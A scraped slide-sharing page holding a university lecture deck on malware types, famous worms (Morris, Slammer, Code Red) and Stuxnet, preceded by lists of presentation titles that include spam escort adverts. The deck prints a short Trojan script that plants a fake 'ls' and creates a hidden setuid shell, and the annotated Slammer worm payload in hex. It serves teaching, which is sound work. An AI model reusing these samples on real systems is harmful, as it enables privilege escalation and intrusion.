FINAL-POLTICAL-DYNAST-WPS-Office-11.pptx
FINAL-POLTICAL-DYNAST-WPS-Office-11.pptxFINAL-POLTICAL-DYNAST-WPS-Office-11.pptx
FINAL-POLTICAL-DYNAST-WPS-Office-11.pptx
 
PRICING-STRATEGY.pptxxxxxxxxxxxxxxxxxxxx
PRICING-STRATEGY.pptxxxxxxxxxxxxxxxxxxxxPRICING-STRATEGY.pptxxxxxxxxxxxxxxxxxxxx
PRICING-STRATEGY.pptxxxxxxxxxxxxxxxxxxxx
 
Storage-computer-fundamentals.pptttttttt
Storage-computer-fundamentals.ppttttttttStorage-computer-fundamentals.pptttttttt
Storage-computer-fundamentals.pptttttttt
 
lesson 1 philsys.pptxxxxxxccccccccccccccxc
lesson 1 philsys.pptxxxxxxccccccccccccccxclesson 1 philsys.pptxxxxxxccccccccccccccxc
lesson 1 philsys.pptxxxxxxccccccccccccccxc
 
POWER SUPPLY-WPS Office.pptx
POWER SUPPLY-WPS Office.pptxPOWER SUPPLY-WPS Office.pptx
POWER SUPPLY-WPS Office.pptx
 
FINAL DEMO TEACHING PPT.pptx
FINAL DEMO TEACHING PPT.pptxFINAL DEMO TEACHING PPT.pptx
FINAL DEMO TEACHING PPT.pptx
 
3A-NETWORK-TOOLS.pptx
3A-NETWORK-TOOLS.pptx3A-NETWORK-TOOLS.pptx
3A-NETWORK-TOOLS.pptx
 
FINAL DEMO TEACHING PPT.pptx
FINAL DEMO TEACHING PPT.pptxFINAL DEMO TEACHING PPT.pptx
FINAL DEMO TEACHING PPT.pptx
 
rqa ims demoS.pptx
rqa ims demoS.pptxrqa ims demoS.pptx
rqa ims demoS.pptx
 
SSI MARKETING PPT.pptx
SSI MARKETING PPT.pptxSSI MARKETING PPT.pptx
SSI MARKETING PPT.pptx
 
COMPUTER MAINTENANCE TECHNOLOGY ppt.pptx
COMPUTER MAINTENANCE TECHNOLOGY ppt.pptxCOMPUTER MAINTENANCE TECHNOLOGY ppt.pptx
COMPUTER MAINTENANCE TECHNOLOGY ppt.pptx
 
COMPUTER FUNDAMENTALS PPT.pptx
COMPUTER FUNDAMENTALS PPT.pptxCOMPUTER FUNDAMENTALS PPT.pptx
COMPUTER FUNDAMENTALS PPT.pptx
 

Recently uploaded

_Math 4-Q4 Week 5.pptx Steps in Collecting Data
_Math 4-Q4 Week 5.pptx Steps in Collecting Data_Math 4-Q4 Week 5.pptx Steps in Collecting Data
_Math 4-Q4 Week 5.pptx Steps in Collecting DataJhengPantaleon
 
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptxPOINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptxSayali Powar
 
EPANDING THE CONTENT OF AN OUTLINE using notes.pptx
EPANDING THE CONTENT OF AN OUTLINE using notes.pptxEPANDING THE CONTENT OF AN OUTLINE using notes.pptx
EPANDING THE CONTENT OF AN OUTLINE using notes.pptxRaymartEstabillo3
 
CARE OF CHILD IN INCUBATOR..........pptx
CARE OF CHILD IN INCUBATOR..........pptxCARE OF CHILD IN INCUBATOR..........pptx
CARE OF CHILD IN INCUBATOR..........pptxGaneshChakor2
 
Crayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon ACrayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon AUnboundStockton
 
How to Configure Email Server in Odoo 17
How to Configure Email Server in Odoo 17How to Configure Email Server in Odoo 17
How to Configure Email Server in Odoo 17Celine George
 
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxSOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxiammrhaywood
 
Hybridoma Technology ( Production , Purification , and Application )
Hybridoma Technology ( Production , Purification , and Application ) Hybridoma Technology ( Production , Purification , and Application )
Hybridoma Technology ( Production , Purification , and Application ) Sakshi Ghasle
 
Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)eniolaolutunde
 
Class 11 Legal Studies Ch-1 Concept of State .pdf
Class 11 Legal Studies Ch-1 Concept of State .pdfClass 11 Legal Studies Ch-1 Concept of State .pdf
Class 11 Legal Studies Ch-1 Concept of State .pdfakmcokerachita
 
How to Make a Pirate ship Primary Education.pptx
How to Make a Pirate ship Primary Education.pptxHow to Make a Pirate ship Primary Education.pptx
How to Make a Pirate ship Primary Education.pptxmanuelaromero2013
 
Proudly South Africa powerpoint Thorisha.pptx
Proudly South Africa powerpoint Thorisha.pptxProudly South Africa powerpoint Thorisha.pptx
Proudly South Africa powerpoint Thorisha.pptxthorishapillay1
 
The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13Steve Thomason
 
Alper Gobel In Media Res Media Component
Alper Gobel In Media Res Media ComponentAlper Gobel In Media Res Media Component
Alper Gobel In Media Res Media ComponentInMediaRes1
 
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Sapana Sha
 
Mastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory InspectionMastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory InspectionSafetyChain Software
 
Final demo Grade 9 for demo Plan dessert.pptx
Final demo Grade 9 for demo Plan dessert.pptxFinal demo Grade 9 for demo Plan dessert.pptx
Final demo Grade 9 for demo Plan dessert.pptxAvyJaneVismanos
 
Employee wellbeing at the workplace.pptx
Employee wellbeing at the workplace.pptxEmployee wellbeing at the workplace.pptx
Employee wellbeing at the workplace.pptxNirmalaLoungPoorunde1
 
Paris 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityParis 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityGeoBlogs
 

Recently uploaded (20)

_Math 4-Q4 Week 5.pptx Steps in Collecting Data
_Math 4-Q4 Week 5.pptx Steps in Collecting Data_Math 4-Q4 Week 5.pptx Steps in Collecting Data
_Math 4-Q4 Week 5.pptx Steps in Collecting Data
 
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptxPOINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
 
EPANDING THE CONTENT OF AN OUTLINE using notes.pptx
EPANDING THE CONTENT OF AN OUTLINE using notes.pptxEPANDING THE CONTENT OF AN OUTLINE using notes.pptx
EPANDING THE CONTENT OF AN OUTLINE using notes.pptx
 
Model Call Girl in Bikash Puri Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Bikash Puri Delhi reach out to us at 🔝9953056974🔝Model Call Girl in Bikash Puri Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Bikash Puri Delhi reach out to us at 🔝9953056974🔝
 
CARE OF CHILD IN INCUBATOR..........pptx
CARE OF CHILD IN INCUBATOR..........pptxCARE OF CHILD IN INCUBATOR..........pptx
CARE OF CHILD IN INCUBATOR..........pptx
 
Crayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon ACrayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon A
 
How to Configure Email Server in Odoo 17
How to Configure Email Server in Odoo 17How to Configure Email Server in Odoo 17
How to Configure Email Server in Odoo 17
 
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxSOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
 
Hybridoma Technology ( Production , Purification , and Application )
Hybridoma Technology ( Production , Purification , and Application ) Hybridoma Technology ( Production , Purification , and Application )
Hybridoma Technology ( Production , Purification , and Application )
 
Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)
 
Class 11 Legal Studies Ch-1 Concept of State .pdf
Class 11 Legal Studies Ch-1 Concept of State .pdfClass 11 Legal Studies Ch-1 Concept of State .pdf
Class 11 Legal Studies Ch-1 Concept of State .pdf
 
How to Make a Pirate ship Primary Education.pptx
How to Make a Pirate ship Primary Education.pptxHow to Make a Pirate ship Primary Education.pptx
How to Make a Pirate ship Primary Education.pptx
 
Proudly South Africa powerpoint Thorisha.pptx
Proudly South Africa powerpoint Thorisha.pptxProudly South Africa powerpoint Thorisha.pptx
Proudly South Africa powerpoint Thorisha.pptx
 
The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13
 
Alper Gobel In Media Res Media Component
Alper Gobel In Media Res Media ComponentAlper Gobel In Media Res Media Component
Alper Gobel In Media Res Media Component
 
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
 
Mastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory InspectionMastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory Inspection
 
Final demo Grade 9 for demo Plan dessert.pptx
Final demo Grade 9 for demo Plan dessert.pptxFinal demo Grade 9 for demo Plan dessert.pptx
Final demo Grade 9 for demo Plan dessert.pptx
 
Employee wellbeing at the workplace.pptx
Employee wellbeing at the workplace.pptxEmployee wellbeing at the workplace.pptx
Employee wellbeing at the workplace.pptx
 
Paris 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityParis 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activity
 

Malwares Malwares Malwares Malwares Malwares

  • 2. Malware Features & Types • Infectious: – Viruses, worms • Concealment: – Trojan horses, logic bombs, rootkits • Malware for stealing information: – Spyware, keyloggers, screen scrapers • Malware for profit: – Dialers, scarewares, ransomware • Malware as platform for other attacks – Botnets, backdoors (trapdoors) • Many malwares have characteristics of multiple types Topic 9: Malware 2
  • 3. Topic 9: Malware 3 Trojan Horse Example: Attacker: Place the following file cp /bin/sh /tmp/.xxsh chmod u+s,o+x /tmp/.xxsh rm ./ls ls $* as /homes/victim/ls • Victim ls • Software that appears to perform a desirable function for the user prior to run or install, but (perhaps in addition to the expected function) steals information or harms the system. • User tricked into executing Trojan horse – Expects (and sees) overt and expected behavior – Covertly perform malicious acts with user’s authorization
  • 4. Topic 9: Malware 4 Trapdoor or Backdoor • Secret entry point into a system – Specific user identifier or password that circumvents normal security procedures. • Commonly used by developers – Could be included in a compiler.
  • 5. Topic 9: Malware 5 Logic Bomb • Embedded in legitimate programs • Activated when specified conditions met – E.g., presence/absence of some file; Particular date/time or particular user • When triggered, typically damages system – Modify/delete files/disks
  • 6. Example of Logic Bomb • In 1982, the Trans-Siberian Pipeline incident occurred. A KGB operative was to steal the plans for a sophisticated control system and its software from a Canadian firm, for use on their Siberian pipeline. The CIA was tipped off by documents in the Farewell Dossier and had the company insert a logic bomb in the program for sabotage purposes. This eventually resulted in “the most monumental non-nuclear explosion and fire ever seen from space”. Topic 9: Malware 6
  • 7. Spyware • Malware that collects little bits of information at a time about users without their knowledge – Keyloggers: stealthly tracking and logging key strokes – Screen scrapers: stealthly reading data from a computer display – May also tracking browsing habit – May also re-direct browsing and display ads Topic 9: Malware 7
  • 8. Scareware • Malware that scares victims into take actions that ultimately end up compromising our own security. – E.g., paying for and installing fake anti-virus products Topic 9: Malware 8
  • 10. Ransomware • Holds a computer system, or the data it contains, hostage against its user by demanding a ransom. – Disable an essential system service or lock the display at system startup – Encrypt some of the user's personal files, originally referred to as cryptoviruses, cryptotrojans or cryptoworms • Victim user has to – enter a code obtainable only after wiring payment to the attacker or sending an SMS message – buy a decryption or removal tool Topic 9: Malware 10
  • 11. Topic 9: Malware 11 Virus • Attach itself to a host (often a program) and replicate itself • Self-replicating code – Self-replicating Trojan horses – Alters normal code with “infected” version • Operates when infected code executed If spread condition then For target files if not infected then alter to include virus Perform malicious action Execute normal program
  • 12. Topic 9: Malware 12 Worm • Self-replicating malware that does not require a host program • Propagates a fully working version of itself to other machines • Carries a payload performing hidden tasks – Backdoors, spam relays, DDoS agents; … • Phases – Probing  Exploitation  Replication  Payload
  • 13. General Worm Trends • Speed of spreading – Slow to fast to stealthy • Vector of infection – Single to varied – Exploiting software vulnerabilities to exploiting human vulnerabilities • Payloads – From “no malicious payloads beyond spreading” to botnets, spywares, and physical systems Topic 9: Malware 13
  • 14. Topic 9: Malware 14 Morris Worm (November 1988) • First major worm • Written by Robert Morris – Son of former chief scientist of NSA’s National Computer Security Center What comes next: 1 11 21 1211 111221?
  • 15. Topic 9: Malware 15 Morris Worm Description • Two parts – Main program to spread worm • look for other machines that could be infected • try to find ways of infiltrating these machines – Vector program (99 lines of C) • compiled and run on the infected machines • transferred main program to continue attack
  • 16. Topic 9: Malware 16 Other Features of The Worm • Self-hiding – Program is shown as 'sh' when ps – Files didn’t show up in ls • Find targets using several mechanisms: • 'netstat -r -n‘, /etc/hosts, … • Compromise multiple hosts in parallel – When worm successfully connects, forks a child to continue the infection while the parent keeps trying new hosts • Worm has no malicious payload • Where does the damage come from?
  • 17. Damage • One host may be repeatedly compromised • Supposedly designed to gauge the size of the Internet • The following bug made it more damaging. – Asks a host whether it is compromised; however, even if it answers yes, still compromise it with probability 1/8. Topic 9: Malware 17
  • 18. Topic 9: Malware 18 Increasing propagation speed • Code Red, July 2001 – Affects Microsoft Index Server 2.0, – Exploits known buffer overflow in Idq.dll – Vulnerable population (360,000 servers) infected in 14 hours • SQL Slammer, January 2003 – Affects in Microsoft SQL 2000 – Exploits known months ahead of worm outbreak • Buffer overflow vulnerability reported in June 2002 • Patched released in July 2002 (Bulletin MS02-39) – Vulnerable population infected in less than 10 minutes
  • 19. Topic 9: Malware 19 Slammer Worms (Jan., 2003) SQL Server 2000 SQLSERVR.EXE • MS SQL Server 2000 receives a request of the worm – SQLSERVR.EXE process listens on UDP Port 1434
  • 20. Topic 9: Malware 20 0000: 4500 0194 b6db 0000 6d11 2e2d 89e5 0a9c E...¶Û..m..-.å.. 0010: cb08 07c7 1052 059a 0180 bda8 0401 0101 Ë..Ç.R....½¨.... 0020: 0101 0101 0101 0101 0101 0101 0101 0101 ................ 0030: 0101 0101 0101 0101 0101 0101 0101 0101 ................ 0040: 0101 0101 0101 0101 0101 0101 0101 0101 ................ 0050: 0101 0101 0101 0101 0101 0101 0101 0101 ................ 0060: 0101 0101 0101 0101 0101 0101 0101 0101 ................ 0070: 0101 0101 0101 0101 0101 0101 01dc c9b0 .............ÜÉ° 0080: 42eb 0e01 0101 0101 0101 70ae 4201 70ae Bë........p®B.p® 0090: 4290 9090 9090 9090 9068 dcc9 b042 b801 B........hÜÉ°B¸. 00a0: 0101 0131 c9b1 1850 e2fd 3501 0101 0550 ...1ɱ.Pâý5....P 00b0: 89e5 5168 2e64 6c6c 6865 6c33 3268 6b65 .åQh.dllhel32hke 00c0: 726e 5168 6f75 6e74 6869 636b 4368 4765 rnQhounthickChGe 00d0: 7454 66b9 6c6c 5168 3332 2e64 6877 7332 tTf¹llQh32.dhws2 00e0: 5f66 b965 7451 6873 6f63 6b66 b974 6f51 _f¹etQhsockf¹toQ 00f0: 6873 656e 64be 1810 ae42 8d45 d450 ff16 hsend¾..®B.EÔP.. 0100: 508d 45e0 508d 45f0 50ff 1650 be10 10ae P.EàP.EðP..P¾..® 0110: 428b 1e8b 033d 558b ec51 7405 be1c 10ae B....=U.ìQt.¾..® 0120: 42ff 16ff d031 c951 5150 81f1 0301 049b B...Ð1ÉQQP.ñ.... 0130: 81f1 0101 0101 518d 45cc 508b 45c0 50ff .ñ....Q.EÌP.EÀP. 0140: 166a 116a 026a 02ff d050 8d45 c450 8b45 .j.j.j..ÐP.EÄP.E 0150: c050 ff16 89c6 09db 81f3 3c61 d9ff 8b45 ÀP...Æ.Û..óa...E 0160: b48d 0c40 8d14 88c1 e204 01c2 c1e2 0829 ´..@...Áâ..ÂÁâ.) 0170: c28d 0490 01d8 8945 b46a 108d 45b0 5031 Â....Ø.E´j..E°P1 0180: c951 6681 f178 0151 8d45 0350 8b45 ac50 ÉQf.ñx.Q.E.P.E¬P 0190: ffd6 ebca .ÖëÊ The 0x01 characters overflow the buffer and spill into the stack right up to the return address This value overwrites the return address and points it to a location in sqlsort.dll which effectively calls a jump to %esp UDP packet header This byte signals the SQL Server to store the contents of the packet in the buffer Restore payload, set up socket structure, and get the seed for the random number generator Main loop of Slammer: generate new random IP address, push arguments onto stack, call send method, loop around NOP slide This is the first instruction to get executed. It jumps control to here. Slammer’s code is 376 bytes!
  • 21. Topic 9: Malware 21 Research Worms • Warhol Worms – Could infect all vulnerable hosts in 15 minutes – 1 hour – Uses optimized scanning in three phases • Phase 1: initial hit list of potentially vulnerable hosts • Phase 2: local subnet scanning • Phase 3: permutation scanning for complete, self-coordinated coverage, all instances pick a random host as starting target and follow up with hosts in a particular order (the same order for all instances); if a target host is already compromised, pick another random host • Flash Worms – Could infect all vulnerable hosts in 30 seconds – Determines a complete hit list of servers with relevant service open and include it with the worm
  • 22. Topic 9: Malware 22 Email Worms: Spreading as Email Attachments • Love Bug worm (ILOVEYOU worm) (2000): – May 3, 2000: 5.5 to 10 billion dollars in damage • MyDoom worm (2004) – First identified in 26 January 2004: – On 1 February 2004, about 1 million computers infected with Mydoom begin a massive DDoS attack against the SCO group • Similar method use text messages on mobile phones
  • 23. Stuxnet: History (1) • 2009 June: Earliest Stuxnet seen – Does not use MS10-046 • Microsoft Security Bulletin MS10-046: Vulnerability in Windows Shell Could Allow Remote Code Execution – Does not have signed drivers • 2010 Jan: Stuxnet driver signed – With a valid certificate belonging to Realtek Semiconductors • 2010 June: Virusblokada reports W32.Stuxnet – Stuxnet use MS10-046 – Verisign revokes Realtek certificate • 2010 July: Eset identify new Stuxnet driver – With a valid certificate belonging to JMicron Technology Corp • 2010 July: Siemens report they are investigating malware SCADA systems – Verisign revokes JMicron certificate Topic 9: Malware 23
  • 24. History (2) • 2010 Aug: Microsoft issues MS10-046 – Patches windows shell shortcut vulnerability • 2010 Sept: Microsoft issues MS10-061 – Patches Printer Spooler Vulnerability • 2010 Sept: Iran nuclear plant hit by delay – Warm weather blamed – Measured temperatures were at historical averages • 2010 Oct: Iran arrest “spies” – Spies who attempted to sabotage the country's nuclear programme – Russian nuclear nuclear experts flee Iran Topic 9: Malware 24
  • 25. Scenario (3) • The malicious binaries need to be signed to avoid suspicion – Two digital certificates were compromised – High probability that the digital certificates/keys were physically stolen from the companies premises – Realtek and JMicron are in close proximity Topic 9: Malware 25
  • 26. Scenario (4) • Initial Infection – Stuxnet needed to be introduced to the targeted environment • Insider • Willing third party • Unwilling third party such as a contractor – Delivery method • USB drive • Windows Maintenance Laptop Topic 9: Malware 26
  • 27. Scenario (5) • Infection Spread – Look for Windows computer that program the PLC’s (Called Field PG) • The Field PG are typically not network • Spread the Infection on computers on the local LAN – Zero-day vulnerabilities – Two-year old vulnerability – Spread to all available USB drives – When a USB drive is connected to the Field PG, the Infection jumps to the Field PG • The “airgap” is thus breached Topic 9: Malware 27
  • 28. Scenario (6) • Target Infection – Look for Specific PLC • Running Step 7 Operating System – Change PLC code • Sabotage system • Hide modifications – Command and Control may not be possible • Due to the “airgap” • Functionality already embedded Topic 9: Malware 28
  • 29. Command & Control • Stuxnet contacts the command and control server – Test if can connect to: • www.windowsupdate.com • www.msn.com – On port 80 – Sends some basic information about the compromised computer to the attacker – www.mypremierfutbol.com – www.todaysfutbol.com – The two URLs above previously pointed to servers in Malaysia and Denmark Topic 9: Malware 29
  • 30. Command & Control (2) Topic 9: Malware 30
  • 31. Windows Rootkit Functionality • Stuxnet has the ability to hide copies of its files copied to removable drives • Stuxnet extracts Resource 201 as MrxNet.sys. – The driver is registered as a service creating the following registry entry: – HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesMRxNet”I magePath” = “%System%driversmrxnet.sys” – The driver file is a digitally signed with a legitimate Realtek digital certificate. – The driver then filters(hides) files that : • Files with a “.LNK” extension having a size of 4,171 bytes.• • Files named “~WTR[FOUR NUMBERS].TMP”, – whose size is between 4Kb and 8Mb; the sum of the four numbers, modulo 10 is null. For example, 4+1+3+2=10=0 mod 10 • Examples: – Copy of Copy of Copy of Copy of Shortcut to.lnk – Copy of Shortcut to.lnk – ~wtr4141.tmp Topic 9: Malware 31
  • 32. Propagation Methods: Network • Peer-to-peer communication and updates • Infecting WinCC machines via a hardcoded database server password • Propagating through network shares • Propagating through the MS10-061 Print Spooler Zero-Day Vulnerability • Propagating through the MS08-067 Windows Server Service Vulnerability Topic 9: Malware 32
  • 33. Propagation Methods: USB • LNK Vulnerability (CVE-2010-2568) • AutoRun.Inf Topic 9: Malware 33
  • 34. What was the target? • Bushehr Nuclear Plant in Iran – 60% Infections in Iran – No other commercial gain – Stuxnet complexity – Stuxnet self destruct date – Siemens specific PLC’s Topic 9: Malware 34
  • 35. Conclusion • Stuxnet represents the first of many milestones in malicious code history – It is the first to exploit multiple 0-day vulnerabilities, – Compromise two digital certificates, – And inject code into industrial control systems – and hide the code from the operator. • Stuxnet is of such great complexity – Requiring significant resources to develop – That few attackers will be capable of producing a similar threat • Stuxnet has highlighted direct-attack attempts on critical infrastructure are possible and not just theory or movie plotlines. Topic 9: Malware 35
  • 36. Topic 9: Malware 40 Zombie & Botnet • Secretly takes over another networked computer by exploiting software flows • Builds the compromised computers into a zombie network or botnet – a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. • Uses it to indirectly launch attacks – E.g., DDoS, phishing, spamming, cracking
  • 37. Topic 9: Malware 41 Rootkit • A rootkit is software that enables continued privileged access to a computer while actively hiding its presence from administrators by subverting standard operating system functionality or other applications. • Emphasis is on hiding information from administrators’ view, so that malware is not detected – E.g., hiding processes, files, opened network connections, etc • Example: Sony BMG copy protection rootkit scandal – In 2005, Sony BMG included Extended Copy Protection on music CDs, which are automatically installed on Windows on CDs are played.
  • 38. Types of Rootkits • User-level rootkits – Replace utilities such as ps, ls, ifconfig, etc – Replace key libraries – Detectable by utilities like tripwire • Kernel-level rootkits – Replace or hook key kernel functions – Through, e.g., loadable kernel modules or direct kernel memory access – A common detection strategy: compare the view obtained by enumerating kernel data structures with that obtained by the API interface – Can be defended by kernel-driver signing (required by 64-bit windows) Topic 9: Malware 42
  • 39. Topic 9: Malware 44 How does a computer get infected with malware or being intruded? • Executes malicious code via user actions (email attachment, download and execute trojan horses, or inserting USB drives) • Buggy programs accept malicious input – daemon programs that receive network traffic – client programs (e.g., web browser, mail client) that receive input data from network – Programs Read malicious files with buggy file reader program • Configuration errors (e.g., weak passwords, guest accounts, DEBUG options, etc) • Physical access to computer